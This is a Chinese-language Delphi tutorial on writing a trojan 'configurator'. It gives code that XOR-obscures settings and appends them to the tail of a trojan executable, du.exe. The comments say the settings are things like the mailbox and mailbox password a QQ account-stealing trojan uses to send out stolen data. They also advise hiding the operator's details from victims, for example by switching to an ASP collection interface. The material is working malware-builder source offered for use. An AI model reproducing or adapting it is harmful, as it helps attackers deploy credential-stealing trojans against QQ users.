木马配置器通用写法--木马配置器通用写法

{该函数是给配置文件加密用的,采用的是xor加密方式,你可以改成你喜欢的加密方式.
当然,这部分绝对可以省略不要.但如果你往木马中写的配置信息涉及到你的敏感资料,
例如往QQ木马尾部写"邮箱"? "邮箱密码"? 那样人家拿Windows记事本一看,明文记录.
有了这部分就不会出现这种情况,xor虽然简单,但对付菜鸟足亦.需要提醒的一点是,这
里不管你用什么加密方式.木马运行后在内存中一定是解密的,用WinHex类工具一查内存
还是可以查到你的资料.所以尽量避免填写敏感资料,例如QQ木马改用ASP接口,这样它
查到的也是没用的一个网址而已.
}

function EncryptSettings(Str : String): String;
var
X, Y : Integer;
A : Byte;
Key:string;
begin
Key:='Fi7ke'; //这个是加密钥匙,你可以随便设置,但解密钥匙要一样,不然解不了密
Y := 1;
for X := 1 to Length(Str) do
begin
A := (ord(Str[X]) and $0f) xor (ord(Key[Y]) and $0f);
Str[X] := char((ord(Str[X]) and $f0) + A);
Inc(Y);
If Y > length(Key) then Y := 1;
end;
Result := Str;
end;

{这一个部分就是正式将数据添加到木马尾部了.本程序上所用到的控件有:
Edit1 ~ Edit5 , 一个Button
}

procedure TForm1.Button1Click(Sender: TObject);
var
f: file;
str: array[1..255] of char;
Each_size: array[1..1] of char;
HostName: string;
len, I: integer;
begin

HostName := EncryptSettings(edit1.Text+'>'+edit2.Text+'>'+edit3.Text+'>'+edit4.Text+'>'+edit5.Text+'>');
//将所有数据都加在一起,并用 > 号来阁开区分,最后用上面的函数加密后付值给变量HostName.

AssignFile(f, 'du.exe'); //打开同目录下的du.exe,准备修改 (这里假设du.exe是木马程序)
Reset(f, 1);

seek(f, filesize(f)); //上次是将指针移动到指定位置,这次是将指针移动到文件末尾
for i := 1 to 255 do str[i] := char(0); //循环写入所有的配置数据
for i := 1 to length(str) do str[i] := HostName[i];
BlockWrite(f, str, length(HostName));
Each_size[1] := char(length(HostName)); //计算出配置数据的长度

blockwrite(f, Each_size, 1); //写入配置文件的长度到末尾,否则文件改变了长度没变会出错
CloseFile(f); //最后别忘了关闭

end;